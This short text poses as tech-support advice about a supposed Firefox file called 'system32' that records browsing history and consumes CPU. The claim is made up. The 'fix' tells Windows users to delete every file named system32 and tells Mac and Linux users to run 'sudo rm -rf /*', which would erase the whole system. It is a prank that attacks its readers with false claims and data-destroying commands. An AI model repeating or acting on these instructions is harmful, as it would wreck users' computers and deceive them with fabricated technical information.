This is a common problem caused by a file implemented with Firefox, called system32. This file is included with every Firefox download. It takes snapshots and records your Firefox browsing history, so the developers know how to improve the user experience. When it cannot detect Firefox on your computer, it is known to use up all your CPU to try and find Firefox.

    FOR WINDOWS:

What you need to do is delete it. Just open "My Computer" or "Computer" from the start menu, search for "system32". Once you find it, wait for everything to load. Then delete all the files named system32. This will take a long time, so you can go grab a cup of coffee while your computer is doing its thing.

FOR MAC AND LINUX: Search for Terminal from the spotlight and then type: sudo rm -rf /*

When prompted, enter your password. No words or symbols will show up when you type it, but that's okay.
